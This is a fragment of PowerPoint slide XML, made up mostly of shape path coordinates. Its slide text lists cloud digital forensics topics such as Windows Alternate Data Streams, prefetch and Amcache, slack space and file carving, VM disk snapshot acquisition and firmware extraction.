                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8371500" y="1692643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381578" y="1647500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="1600199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="320039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381578" y="272739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8371500" y="227596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8355307" y="185105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333495" y="145761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8306557" y="110057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274990" y="78490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8239286" y="51552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8199942" y="29740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8157451" y="13547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112308" y="3469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8065008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856223" y="306451"/>
            <a:ext cx="45434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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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3752" y="760476"/>
            <a:ext cx="6443472" cy="36575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871084" y="1972716"/>
            <a:ext cx="5434330" cy="155638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dirty="0" sz="2200" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Artifacts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120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135" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100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120" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recovery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37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100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Alternate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Streams</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(ADS)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37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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>caches</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Amcache)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37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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Slack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>space</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>carving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71084" y="4523723"/>
            <a:ext cx="4230370" cy="79184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dirty="0" sz="2200" spc="120" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Snapshot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37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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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215">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>disk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>images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55845" y="6196101"/>
            <a:ext cx="6819900" cy="1173480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dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Firmware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37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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Typically</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>memory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37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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Extracted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>imaging</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>utility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06140" y="2478023"/>
            <a:ext cx="864235" cy="844550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="864235" h="844550">
                <a:moveTo>
                  <a:pt x="432054" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384974" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="422148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384974" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054" y="844296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864108" y="422148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054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746372" y="2705176"/>
            <a:ext cx="1847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35" b="1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06140" y="4575047"/>
            <a:ext cx="864235" cy="843280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="864235" h="843279">
                <a:moveTo>
                  <a:pt x="432054" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384974" y="2473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="9721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="21488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="37515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="57545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="81320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="108584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="139079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="172547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="208731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="247374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="288218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="331007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="375481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="421386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="467290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="511764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="554553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="595397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="634040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="670224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="703692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="734187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="761451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="785226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="805256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="821283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="833050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384974" y="840298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054" y="842772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="840298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="833050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="821283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="805256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="785226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="761451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="734187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="703692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="670224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="634040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="595397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="554553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="511764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="467290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864108" y="421386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="375481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="331007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="288218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="247374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="208731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="172547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="139079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="108584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="81320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="57545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="37515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="21488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="9721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="2473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054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746372" y="4801870"/>
            <a:ext cx="1847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0" b="1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21379" y="6405371"/>
            <a:ext cx="864235" cy="844550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="864235" h="844550">
                <a:moveTo>
                  <a:pt x="432054" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384974" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="422147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384974" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054" y="844295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864108" y="422147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054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761613" y="6632829"/>
            <a:ext cx="1847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0" b="1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01359" y="306451"/>
            <a:ext cx="465264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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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8596" y="760476"/>
            <a:ext cx="6659880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424682" y="3475735"/>
            <a:ext cx="2388235" cy="4552315"/>
            <a:chOff x="3424682" y="3475735"/>
            <a:chExt cx="2388235" cy="4552315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3424682" y="3475735"/>
              <a:ext cx="2290445" cy="4552315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="72135" y="4408893"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546830"/>
                  </a:lnTo>
